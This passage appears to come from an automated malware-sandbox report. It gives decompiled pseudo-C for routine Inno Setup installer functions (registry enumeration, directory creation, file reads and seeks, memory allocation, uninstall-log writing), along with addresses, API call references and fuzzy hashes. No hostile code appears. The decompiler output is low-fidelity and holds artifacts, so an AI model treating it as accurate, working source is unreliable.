								E00403628( &_v24, E004036BC(_v24) + _t55, 0, _t92);
								continue;
							}
							L9:
							__eflags = 0;
							_pop(_t79);
							 *[fs:eax] = _t79;
							_push(E0042DF31);
							return RegCloseKey(_v20);
							goto L11;
						}
						__eflags = _t44;
						if(_t44 == 0) {
							_t51 = E0042DE2C(_v5, _t61, E00403880(_v24), _v20, _t82, _t83);
							__eflags = _t51;
							if(_t51 != 0) {
								_t61 = _t61 + 1;
							}
							goto L3;
						}
						goto L9;
					}
				}
				L11:
			}

0x0042de2c
0x0042de2c
0x0042de2d
0x0042de2f
0x0042de32
0x0042de33
0x0042de34
0x0042de37
0x0042de3a
0x0042de3d
0x0042de40
0x0042de45
0x0042de46
0x0042de4b
0x0042de4e
0x0042de58
0x0042df31
0x0042df3a
0x0042df41
0x0042df43
0x0042df46
0x0042df49
0x0042df56
0x0042de5e
0x0042de6f
0x0042de74
0x0042de76
0x00000000
0x0042de7c
0x0042de7e
0x0042de7f
0x0042de84
0x0042de87
0x0042de94
0x0042de99
0x0042de9b
0x0042de9b
0x0042dea3
0x0042dec0
0x0042deca
0x00000000
0x00000000
0x0042decf
0x0042ded4
0x0042ded9
0x0042deec
0x00000000
0x0042deec
0x0042df13
0x0042df13
0x0042df15
0x0042df18
0x0042df1b
0x0042df29
0x00000000
0x0042df29
0x0042def3
0x0042def5
0x0042df07
0x0042df0c
0x0042df0e
0x0042df10
0x0042df10
0x00000000
0x0042df0e
0x00000000
0x0042def5
0x0042de76
0x00000000

APIs

Part of subcall function 0042DD88: 6D2B6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00477FD3,?,00000001,?,?,00477FD3,?,00000001,00000000), ref: 0042DDA4

RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DF2A,?,?,00000008,00000000,00000000,0042DF57), ref: 0042DEC0
RegCloseKey.ADVAPI32(?,0042DF31,?,00000000,00000000,00000000,00000000,00000000,0042DF2A,?,?,00000008,00000000,00000000,0042DF57), ref: 0042DF24

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B6790CloseEnum
String ID:
API String ID: 3281829720-0
Opcode ID: a1ac696ee218a8eeabb0c01c628a63f6c24012838d16b5b5ee1957813050cb3e
Instruction ID: 1d2dbbe86b08e495ed275bfdf873bccf740e32e67f72735296cd9aac11293f9a
Opcode Fuzzy Hash: a1ac696ee218a8eeabb0c01c628a63f6c24012838d16b5b5ee1957813050cb3e
Instruction Fuzzy Hash: A7319530F046056EDB14DFA1DD92BBFB7B8EB49304F91447AF501F3280D6789A058A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00451710 Relevance: 3.0, APIs: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00451710(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v16;
				long _v20;
				intOrPtr _t14;
				intOrPtr _t29;
				void* _t37;
				void* _t39;
				intOrPtr _t40;

				_t37 = _t39;
				_t40 = _t39 + 0xfffffff0;
				if(E00451338(__eax,  &_v16) != 0) {
					_push(_t37);
					_push(0x451778);
					_push( *[fs:eax]);
					 *[fs:eax] = _t40;
					_push(E00403880(__ecx));
					_t14 = E00403880(__edx);
					L00405B7C(); // executed
					_v8 = _t14;
					_v20 = GetLastError();
					_t29 = _t14;
					 *[fs:eax] = _t29;
					_push(0x45177f);
					return E00451374( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}

0x00451711
0x00451713
0x0045172b
0x00451736
0x00451737
0x0045173c
0x0045173f
0x00451749
0x0045174c
0x00451752
0x00451757
0x0045175f
0x00451764
0x00451767
0x0045176a
0x00451777
0x0045172d
0x0045172f
0x00451791
0x00451791

APIs

6D2B6060.KERNEL32(00000000,00000000,00000000,00451778), ref: 00451752
GetLastError.KERNEL32(00000000,00000000,00000000,00451778), ref: 0045175A

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B6060ErrorLast
String ID:
API String ID: 3664743183-0
Opcode ID: 18c3d30cadab73bf1070bb3bf14be97b990e8ccd315e465bb6474ee619487409
Instruction ID: 7b115dc6eb4af6d2ff90c9cc33de5ee4d23a40dcb701f4467ef20231f033a4b0
Opcode Fuzzy Hash: 18c3d30cadab73bf1070bb3bf14be97b990e8ccd315e465bb6474ee619487409
Instruction Fuzzy Hash: 4401D671A042046B8B00EB7D9C4159EB7ECDB4C75575046BBFC04E3652EA386E04859C

Uniqueness

Uniqueness Score: -1.00%

Function 00451384 Relevance: 3.0, APIs: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00451384(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E00451338(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x4513e3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = CreateDirectoryA(E00403880(__edx), 0); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4513ea);
					return E00451374( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}

0x00451385
0x00451387
0x0045139c
0x004513a7
0x004513a8
0x004513ad
0x004513b0
0x004513bd
0x004513c2
0x004513ca
0x004513cf
0x004513d2
0x004513d5
0x004513e2
0x0045139e
0x004513a0
0x004513fb
0x004513fb

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004513E3), ref: 004513BD
GetLastError.KERNEL32(00000000,00000000,00000000,004513E3), ref: 004513C5

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5bb56d0f40f296cbfc6b3b0335c0770981ede88c196a0ff6712b2ee2d6c041b9
Instruction ID: 938ba35df382dfcdfb9beefa2307b431f0e3cf11fdaf46bac0731064f7af7702
Opcode Fuzzy Hash: 5bb56d0f40f296cbfc6b3b0335c0770981ede88c196a0ff6712b2ee2d6c041b9
Instruction Fuzzy Hash: 89F02831A04304ABEB00EFB59C61A9EB7E8EB09311B1046BBFC04E3A52E63D5E04859C

Uniqueness

Uniqueness Score: -1.00%

Function 00423454 Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423454(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x38)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffec;
				_t12 = 0x48c5e8;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						_t11 = 0;
					} else {
						_t11 =  *0x48d014; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E00423548(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}

0x00423458
0x00423466
0x00423469
0x0042346e
0x00423473
0x00423476
0x00423485
0x0042347d
0x0042347d
0x0042347d
0x0042348b
0x00423496
0x0042349b
0x0042349c
0x0042349f
0x004234a8

APIs

LoadCursorA.USER32 ref: 00423461
LoadCursorA.USER32 ref: 0042348B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CursorLoad
String ID:
API String ID: 3238433803-0
Opcode ID: 6dde000a0a0e34f55f7049b4d6f06950876ffd2d69d58a1a52cb702dc8031ddb
Instruction ID: f1cdcf42ee231fc48914d0816d784dbf9fabfab0a5fd518fbdb8f3d8cfa81afc
Opcode Fuzzy Hash: 6dde000a0a0e34f55f7049b4d6f06950876ffd2d69d58a1a52cb702dc8031ddb
Instruction Fuzzy Hash: 08F0EC21B001242AD6106E7E6CC0E2A7269DB86335BA103BFFD3EC72D1CA2E5D4142ED

Uniqueness

Uniqueness Score: -1.00%

Function 0042E324 Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0042E324(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x42e396);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x42e378);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryA(E00403880(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(E0042E37F);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}

0x0042e325
0x0042e327
0x0042e32b
0x0042e32e
0x0042e333
0x0042e338
0x0042e339
0x0042e33e
0x0042e341
0x0042e344
0x0042e349
0x0042e34a
0x0042e34f
0x0042e352
0x0042e35d
0x0042e362
0x0042e367
0x0042e36a
0x0042e36d
0x0042e372
0x0042e374
0x0042e377

APIs

SetErrorMode.KERNEL32(00008000,00008000), ref: 0042E32E
LoadLibraryA.KERNEL32(00000000,00000000,0042E378,?,00000000,0042E396,?,00008000,00008000), ref: 0042E35D

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 158fc127d9a9c1394863e303c0cf28200bd4273cb2bfef562f60aa1864088080
Instruction ID: 08286a8ec40b63e8f204cdaaf7e4e9679ed602366fd05ea0d6980fae83b11ad5
Opcode Fuzzy Hash: 158fc127d9a9c1394863e303c0cf28200bd4273cb2bfef562f60aa1864088080
Instruction Fuzzy Hash: B2F08270A04744BEDF119F779C5282BBAFCE709B0179348B6FC14A3A91E63C6810C928

Uniqueness

Uniqueness Score: -1.00%

Function 0045012C Relevance: 3.0, APIs: 2, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0045012C(intOrPtr* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t7;
				intOrPtr* _t12;

				_push(__ecx);
				_t12 = __eax;
				_t7 = ReadFile( *(__eax + 4), __edx, __ecx,  &_v16, 0); // executed
				if(_t7 == 0 && ( *((char*)(_t12 + 8)) != 0 || GetLastError() != 0x6d)) {
					E00450118( *_t12);
				}
				return _v16;
			}

0x0045012f
0x00450134
0x00450143
0x0045014a
0x0045015e
0x0045015e
0x0045016a

APIs

ReadFile.KERNEL32(?,?,00000008,?,00000000,00000008,?,00000008,?,00450180,?,00000000,?,0048A5D0,00000000,0048A62D), ref: 00450143
GetLastError.KERNEL32(?,?,00000008,?,00000000,00000008,?,00000008,?,00450180,?,00000000,?,0048A5D0,00000000,0048A62D), ref: 00450152

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: e16c3908efde4890701f1087c1e5ca9a9b6fb4c83a84b18f5e4a415587f5e180
Instruction ID: 71517902c06dfbff098452ae4836fc59e1cf149d510e443aa95dddc476e99a72
Opcode Fuzzy Hash: e16c3908efde4890701f1087c1e5ca9a9b6fb4c83a84b18f5e4a415587f5e180
Instruction Fuzzy Hash: 50E092652045106AEB24965A9CC4F6B67DCCBC6325F04407BF904CB243C6A8DC088776

Uniqueness

Uniqueness Score: -1.00%

Function 004501AC Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004501AC(intOrPtr* __eax, void* __edx) {
				long _v16;
				long _v20;
				long _t8;
				long _t9;
				intOrPtr* _t11;

				asm("movsd");
				asm("movsd");
				_t11 = __eax;
				_t8 = SetFilePointer( *(__eax + 4), _v20,  &_v16, 0); // executed
				_t9 = _t8 + 1;
				if(_t9 == 0) {
					_t9 = GetLastError();
					if(_t9 != 0) {
						_t9 = E00450118( *_t11);
					}
				}
				return _t9;
			}

0x004501b7
0x004501b8
0x004501b9
0x004501cb
0x004501d0
0x004501d1
0x004501d3
0x004501da
0x004501de
0x004501de
0x004501da
0x004501e8

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 004501CB
GetLastError.KERNEL32(?,?,?,00000000), ref: 004501D3

Part of subcall function 00450118: GetLastError.KERNEL32(00000001,0044FF96,00000000,?,00000000,00000000,?,00000080,00000000,?,00000000,?,?,0048A596,00000001,00000000), ref: 0045011B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 007d889ed42475c48677b5fd9ba2e1e9edc28356a9fe93dae6e188575934ee07
Instruction ID: b87ea0d377df45749cf1eac7bcc269f7c2b8c01b89412a90b74661ca3192d698
Opcode Fuzzy Hash: 007d889ed42475c48677b5fd9ba2e1e9edc28356a9fe93dae6e188575934ee07
Instruction Fuzzy Hash: ABE0923A3045016BD610D55DC881A9F37DCDF853A5F044126F954DB182DA66AD048766

Uniqueness

Uniqueness Score: -1.00%

Function 0044FFE4 Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044FFE4(intOrPtr* __eax, long* __edx) {
				long _t8;
				long* _t11;
				intOrPtr* _t13;

				_t11 = __edx;
				_t13 = __eax;
				 *(__edx + 4) = 0;
				_t8 = SetFilePointer( *(__eax + 4), 0, __edx + 4, 1); // executed
				 *_t11 = _t8;
				if( *_t11 == 0xffffffff) {
					_t8 = GetLastError();
					if(_t8 != 0) {
						return E00450118( *_t13);
					}
				}
				return _t8;
			}

0x0044ffe6
0x0044ffe8
0x0044ffec
0x0044fffb
0x00450000
0x00450005
0x00450007
0x0045000e
0x00000000
0x00450012
0x0045000e
0x00450019

APIs

SetFilePointer.KERNEL32(?,00000000,?,00000001,?,00000001,004508C7,?,00000000,00000000,?,00000001,00000000,00000002,00000000,00475C02), ref: 0044FFFB
GetLastError.KERNEL32(?,00000000,?,00000001,?,00000001,004508C7,?,00000000,00000000,?,00000001,00000000,00000002,00000000,00475C02), ref: 00450007

Part of subcall function 00450118: GetLastError.KERNEL32(00000001,0044FF96,00000000,?,00000000,00000000,?,00000080,00000000,?,00000000,?,?,0048A596,00000001,00000000), ref: 0045011B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 5e43d63ecdfeff7ab5c21cab3cc5596e29a7b730039e7c13a3b7570eb3d79c82
Instruction ID: 9c942d1f11ac79fb5698bfd25e457c4f2283ae479994a009dd78b44e1105f4e5
Opcode Fuzzy Hash: 5e43d63ecdfeff7ab5c21cab3cc5596e29a7b730039e7c13a3b7570eb3d79c82
Instruction Fuzzy Hash: 23E0DF75200614CFDB10EEB48981B6372ECDF04325F048176E904CF2C6E635DC008B64

Uniqueness

Uniqueness Score: -1.00%

Function 004501EC Relevance: 3.0, APIs: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004501EC(intOrPtr* __eax, void* __ecx, void* __edx) {
				long _v8;
				long _t7;
				long _t8;
				intOrPtr* _t10;

				_t10 = __eax;
				_v8 = 0;
				_t7 = SetFilePointer( *(__eax + 4), 0,  &_v8, 2); // executed
				_t8 = _t7 + 1;
				if(_t8 == 0) {
					_t8 = GetLastError();
					if(_t8 != 0) {
						_t8 = E00450118( *_t10);
					}
				}
				return _t8;
			}

0x004501ee
0x004501f2
0x00450202
0x00450207
0x00450208
0x0045020a
0x00450211
0x00450215
0x00450215
0x00450211
0x0045021c

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,004684BF,00000000), ref: 00450202
GetLastError.KERNEL32(00000000,00000000,00000000,00000002,?,?,004684BF,00000000), ref: 0045020A

Part of subcall function 00450118: GetLastError.KERNEL32(00000001,0044FF96,00000000,?,00000000,00000000,?,00000080,00000000,?,00000000,?,?,0048A596,00000001,00000000), ref: 0045011B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 93c00a7808f9e3db7b3a31e4c85824157b8f31de8e17eb042cadab940a18e262
Instruction ID: 9d737e19be7681f55fccf2234e65618eb5bbb2662f6b147db5e1bf7809bd599b
Opcode Fuzzy Hash: 93c00a7808f9e3db7b3a31e4c85824157b8f31de8e17eb042cadab940a18e262
Instruction Fuzzy Hash: 0BE012653446045BEB00EAB5C9C6B2B32DCDB48305F04847AB944CF183D674DC054B25

Uniqueness

Uniqueness Score: -1.00%

Function 004014EC Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014EC(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E004013A0(0x48d440, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x004014ef
0x004014f9
0x00401508
0x004014fb
0x004014fb
0x004014fb
0x0040150e
0x0040151b
0x00401520
0x00401522
0x00401526
0x0040152f
0x00401536
0x00401542
0x00401549
0x00000000
0x00401549
0x00401536
0x0040154e

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017F5), ref: 0040151B
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017F5), ref: 00401542

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b47dfa8464c0bebe42472cbbc825c69c8bd26aa5f95237cd5ae25c2d008f6871
Instruction ID: 1d64295b8d0e0b9a38f8b2fc07ed469c99ec606e4b1f6f299006d044831eee91
Opcode Fuzzy Hash: b47dfa8464c0bebe42472cbbc825c69c8bd26aa5f95237cd5ae25c2d008f6871
Instruction Fuzzy Hash: 1FF0E2B2B0162027EB206A6A0C82B565A949BC5B94F154077FE09FF3D9D2798C0142A9

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 1.6, APIs: 1, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1be86bce22b5b922478077c9111833c0686116524b5a74a9732a73a061353000
Instruction ID: 4888d5c5df2a00dd8709a585e54e943d84f049166da63ae2a3cb68c5ff1729c9
Opcode Fuzzy Hash: 1be86bce22b5b922478077c9111833c0686116524b5a74a9732a73a061353000
Instruction Fuzzy Hash: 99C19E2148E2C00FCB268B709AA55947FA0BE53310B1D5BEFC5C1BEDE7D26D59069B0A

Uniqueness

Uniqueness Score: -1.00%

Function 00458C5C Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00458C5C(void* __eax, void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, signed int _a4) {
				intOrPtr _v4104;
				intOrPtr* _v4108;
				intOrPtr _v4114;
				intOrPtr _v4118;
				char _v4120;
				intOrPtr _v4124;
				signed int _v4236;
				intOrPtr _v4240;
				intOrPtr _v4244;
				intOrPtr _v4248;
				char _v4376;
				char _v4504;
				void _v4568;
				char _v4576;
				intOrPtr _t76;
				intOrPtr _t104;
				signed char _t106;
				intOrPtr _t134;
				intOrPtr _t143;
				void* _t148;
				void* _t150;
				void* _t152;
				void* _t153;
				intOrPtr _t155;

				_t152 = _t153;
				_push(__eax);
				_t155 = _t153 + 0xffffffffffffee28;
				_t106 = __ecx;
				_t148 = __eax;
				_v4104 = 0;
				if((__ecx ^ 0x00000001) == 0) {
					_v4108 = E0044FF24(__edx, 1, 0, 2, 2);
				} else {
					_t104 = E0044FF24(__edx, 1, 0, 2, 0); // executed
					_v4108 = _t104;
				}
				_push(_t152);
				_push(0x458e67);
				_push( *[fs:edx]);
				 *[fs:edx] = _t155;
				if((_t106 ^ 0x00000001) == 0) {
					_t111 = 0x1c0;
					E0045016C(_v4108, 0x1c0,  &_v4568);
					E00450194(_v4240);
				} else {
					E00402A64( &_v4568, 0x1c0);
					_t111 = 0x1c0;
					E0045023C(_v4108, 0x1c0,  &_v4568, _t152);
				}
				_t143 =  *((intOrPtr*)(_t148 + 4));
				while(_t143 != 0) {
					_v4120 =  *((intOrPtr*)(_t143 + 0x10));
					_v4118 =  *((intOrPtr*)(_t143 + 8));
					_v4114 =  *((intOrPtr*)(_t143 + 0xc));
					E00458BE4( &_v4120, 0xa, _t152);
					E00458BE4(_t143 + 0x12,  *((intOrPtr*)(_t143 + 0xc)), _t152);
					_pop(_t111);
					_v4244 = _v4244 + 1;
					_t143 =  *((intOrPtr*)(_t143 + 4));
				}
				E00458B60(_t111, _t152); // executed
				E0044FFE4(_v4108,  &_v4576);
				_v4240 = _v4576;
				E00450194(0);
				memcpy( &_v4568, 0x5d6dd68 + "Inno Setup Uninstall Log (b)", 0x10 << 2);
				_t150 = _t148;
				E004075E4( &_v4504, 0x7f,  *((intOrPtr*)(_t150 + 0x14)));
				if((_t106 ^ 0x00000001 | _a4) != 0) {
					E004075E4( &_v4376, 0x7f,  *((intOrPtr*)(_t150 + 0x18)));
				}
				_t76 =  *((intOrPtr*)(_t150 + 0x20));
				if(_t76 > _v4248) {
					_v4248 = _t76;
				}
				_v4236 = _v4236 |  *(_t150 + 0x1d);
				_v4124 = E0045076C( &_v4568, 0x1bc);
				FlushFileBuffers( *(_v4108 + 4));
				E0045023C(_v4108, 0x1c0,  &_v4568, _t152);
				_pop(_t134);
				 *[fs:eax] = _t134;
				_push(0x458e6e);
				return E00402CA0(_v4108);
			}

0x00458c5d
0x00458c65
0x00458c66
0x00458c6f
0x00458c73
0x00458c77
0x00458c83
0x00458cb5
0x00458c85
0x00458c94
0x00458c99
0x00458c99
0x00458cbd
0x00458cbe
0x00458cc3
0x00458cc6
0x00458ccf
0x00458d01
0x00458d0c
0x00458d1d
0x00458cd1
0x00458cde
0x00458ce9
0x00458cf4
0x00458cf4
0x00458d22
0x00458d27
0x00458d2d
0x00458d37
0x00458d40
0x00458d52
0x00458d5f
0x00458d64
0x00458d65
0x00458d6b
0x00458d6e
0x00458d73
0x00458d85
0x00458d90
0x00458d9e
0x00458dbe
0x00458dc0
0x00458dcf
0x00458dda
0x00458dea
0x00458dea
0x00458def
0x00458df8
0x00458dfa
0x00458dfa
0x00458e11
0x00458e23
0x00458e33
0x00458e49
0x00458e50
0x00458e53
0x00458e56
0x00458e66

APIs

FlushFileBuffers.KERNEL32(?,00000000,00458E67,?,00000000,00000002,00000002), ref: 00458E33

